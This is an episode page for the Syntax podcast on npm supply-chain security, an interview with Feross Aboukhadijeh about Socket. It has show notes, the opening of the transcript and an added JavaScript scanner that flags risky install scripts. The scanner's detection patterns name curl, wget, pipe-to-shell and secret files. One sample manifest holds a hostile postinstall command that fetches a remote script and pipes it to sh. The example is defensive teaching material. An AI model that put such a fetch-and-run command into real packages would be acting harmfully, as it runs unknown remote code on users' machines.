Syntax - Tasty Web Development Treats

705: Is Running Random Code From npm Safe? With Feross Aboukhadijeh

Wes Bos

Tech News, Technology, News

4.9 · 1.2K Ratings

🗓️ 15 December 2023

⏱️ 67 minutes

Summary

In this Supper Club episode of Syntax, Wes and Scott talk with Feross Aboukhadijeh about his work on Socket, which helps make sure the code you get from npm is safe and secure. They also touch on his work on Wormhole and WebTorrent.

Show Notes

00:30 Welcome
00:57 Who is Feross Aboukhadijeh?
01:33 What is Socket? [Socket.dev](https://socket.dev); dominictarr (Dominic Tarr); pull-stream/pull-stream: minimal streams
03:59 Introducing AI package summaries; Example of the AI summaries; Introducing AI Package Summaries
07:04 Is Socket's focus on visibility of an open source project?
10:01 What was the inspiration for Socket? Introducing "safe npm", a Socket npm Wrapper - Socket
16:22 How does Socket detect possible security issues? Removed packages; event-source-polyfill protestware attack; john wick spam attack
18:55 How many projects are you ingesting for Socket to scan?
26:00 What kinds of things are people trying to inject in code? CS253 Web Security
29:54 How do I hook Socket up to my project or GitHub?
32:08 Do we still need to use shrink wrap?
36:34 How did you implement the torrent spec in JavaScript for WebTorrent? WebTorrent Desktop; WebTorrent FAQ
43:11 Why did you build Wormhole? Wormhole
47:33 How expensive is it to maintain Wormhole? Riverside.fm - Record Podcasts And Videos From Anywhere
50:37 What do you think of decentralized code repos? Radicle; Project Fugu; Fugu Tracker
54:29 Understanding passkeys
56:15 Supper Club questions: GitHub Theme - Visual Studio Marketplace; Web Serial API - Web APIs | MDN
01:03:04 Sick Picks: Harry Potter audio books
Shameless Plugs: ChatGPT
Hit us up on Socials! Syntax: X, Instagram, Tiktok, LinkedIn, Threads. Wes: X, Instagram, Tiktok, LinkedIn, Threads. Scott: X, Instagram, Tiktok, LinkedIn, Threads.
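The episode title asks whether it is safe to run whatever `npm install` pulls in. One concrete reason the answer is "not blindly" is that npm executes a dependency's lifecycle scripts (preinstall, install, postinstall, prepare) on your machine at install time, before you have called a single function from it. The following is an added JavaScript example, not Socket's code and not anything from the episode: it takes package.json objects, lists their install-time scripts, and applies a few crude regex heuristics (an assumption chosen for illustration, not a detection spec) to flag commands that fetch remote content, pipe into a shell, or reference secrets. The sample manifests are constructed.

```javascript
// Added example (not Socket's code): flag npm lifecycle scripts that run at
// install time. Sample manifests below are constructed for illustration.

// Lifecycle hooks npm runs for a dependency when it is installed.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Crude heuristics (assumptions for illustration, not a detection spec).
const SUSPICIOUS = [
  { reason: "remote-fetch", re: /\b(curl|wget)\b/ },
  { reason: "pipe-to-shell", re: /\|\s*(bash|sh)\b/ },
  { reason: "inline-shell", re: /\b(bash|sh)\s+-c\b/ },
  { reason: "node-eval", re: /\bnode\s+-e\b/ },
  { reason: "reads-secrets", re: /(TOKEN|SECRET|PASSWORD|\.npmrc|\.ssh)/i },
];

// Return the install-time scripts declared in a package.json object.
function findInstallScripts(pkg) {
  const scripts = (pkg && typeof pkg.scripts === "object" && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === "string")
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Classify one manifest: "none" (no install hooks), "review" (hooks present
// but nothing matched), or "high" (a hook matched a suspicious pattern).
function assessPackage(pkg) {
  const findings = findInstallScripts(pkg).map(({ hook, command }) => ({
    hook,
    command,
    reasons: SUSPICIOUS.filter((s) => s.re.test(command)).map((s) => s.reason),
  }));
  let risk = "none";
  if (findings.length) {
    risk = findings.some((f) => f.reasons.length) ? "high" : "review";
  }
  return { name: pkg.name, version: pkg.version, risk, findings };
}

// Walk a map of { packageName: packageJson } (e.g. built from node_modules)
// and report only the packages that deserve a look, highest risk first.
function assessTree(manifests) {
  return Object.values(manifests)
    .map(assessPackage)
    .filter((r) => r.risk !== "none")
    .sort((a, b) => Number(b.risk === "high") - Number(a.risk === "high"));
}

// Constructed sample manifests: a plain library, a native addon that
// legitimately builds on install, and a package with a hostile postinstall.
const SAMPLE_MANIFESTS = {
  "tiny-util": { name: "tiny-util", version: "1.0.0", scripts: { test: "node test.js" } },
  "native-addon": { name: "native-addon", version: "2.3.1", scripts: { install: "node-gyp rebuild" } },
  "evil-pkg": {
    name: "evil-pkg",
    version: "0.0.1",
    scripts: { postinstall: "curl -s https://example.invalid/s.sh | sh" },
  },
};

console.log(JSON.stringify(assessTree(SAMPLE_MANIFESTS), null, 2));
```

A "review" result is not a verdict: native addons legitimately compile on install, which is exactly why a real scanner looks at much more than this (the package's actual code, what changed between versions, who published it). Lifecycle scripts are simply the first thing to check before trusting a fresh dependency; `npm install --ignore-scripts` disables them wholesale if you would rather opt in per package.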

Transcript

0:00.0

I sure hope you're hungry.

0:02.0

Whoa, I'm starving.

0:04.0

Wash those hands, pull up a chair and secure that feed bag.

0:08.0

Because it's time to listen to Scott Tolinski and Wes Bos attempt to use human language to converse with and pick the brains of other developers.

0:16.8

I thought there was going to be food.

0:18.8

So buckle up and grab that oh-shit handle, because this ride is going to get wild.

0:25.0

This is the Syntax Supper Club.

0:30.0

Welcome to Syntax. Today we're talking about: should you just

0:37.6

npm install random code? Can you trust all of the random code that is

0:41.9

47 dependencies deep on npm?

0:45.0

We've got Feross on from socket.dev, as well as, like,

0:50.0

I will wait till a little later on to talk about it, but I do want to talk about WebTorrent

0:55.3

and Wormhole as well, because I think that is super cool. But welcome, Feross.

0:59.7

Thanks for coming on. Yeah, you got it. Thanks for having me.

1:03.0

It's super cool to be here.

1:04.0

Excited to talk with you guys.

1:06.0

Yeah, so you were recommended to us by Darcy.

1:10.0

I've met you before on other things that you were working on, but it seems like you've been

1:15.1

working on socket.dev for, I don't know, about a year now or so? Or is it longer than that?

1:21.3

Actually, going on a little, yeah, more like two years.

1:25.0

Yeah, it's been a little while.

1:26.0

Yeah, well, I guess we launched it about a year and a half ago, so that's probably what you're thinking,

...
